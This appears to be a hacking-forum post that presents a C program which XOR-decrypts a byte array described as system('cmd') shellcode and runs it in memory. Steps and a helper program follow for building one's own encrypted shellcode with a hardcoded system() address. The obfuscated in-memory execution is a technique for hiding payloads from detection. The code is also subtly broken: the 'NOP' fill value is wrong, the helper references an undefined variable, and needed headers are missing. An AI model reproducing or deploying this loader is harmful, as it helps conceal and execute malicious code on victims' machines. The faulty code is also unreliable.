Here you go, an example of how this is done.
#include <stdio.h>
#include <windows.h>
int main()
{
LoadLibrary("msvcrt.dll"); // We need no be sure that system() is loaded in our address.
void (*pFun)(void); // A function pointer. Now it points nowhere.
// This is a system("cmd"); shellcode.
char cryptedCode[]="\x75\xA9\xC5\x11\xDF\x77\xCB\x21\xA3\xA3\xCC\x24\xE6\x65\xD8\x43\xE6\x65\xD9\x4D\xE6\x65\xDA\x44\xE6\x65\xDB\xE\xE6\x65\xDC\x45\xE6\x65\xDD\x58\xE6\x65\xDE\x45\xAD\x65\xD8\x70\x9B\x4F\x91\x28\x55\xDF\xF3";
char *code=(char *)malloc(strlen(cryptedCode)); // HEre will go the decrypted code
memset(code, 90, strlen(cryptedCode)); // Nothing to explain here, just fill it with NOPs
// This is the decrypt method. Just a [byte]^0x20 xor
int i;
for(i=0; i<strlen(cryptedCode); i++) *(code+i)=(unsigned char)(cryptedCode[i]^0x20);
//
pFun=(void *)code;// We assign the function pointer to our in memory decrypted code
pFun(); // And execute it.
}
Note that it will crash on your PC, becouse I use a hardcoded direction to system() function that may not be the same in your computer. In fact, in windows 7 it changes everytime the computer boots. If you want to test it, do the following:
- Use this (
http://evilzone.org/c-c/findaddress/) and get system offset in msvcrt.dll
- Use this (
http://evilzone.org/c-c/opcodeprint/), changing "movl $0x7573b16f, %ebx;" (put the address you got in previous step replacing 7573b16f). Print that shellcode.
- Use this to get a crypted shellcode:
#include <stdio.h>
#include <windows.h>
int main()
{
char shellcode[]="Here goes the shellcode you have just printed.";
int i;
for(i=0; i<strlen(shellcode); i++) printf("\\x%x", (unsigned char)(cryptedCode[i]^0x20));
}
- Put this last crypted shellcode in the first code I put in the post, and you got it.
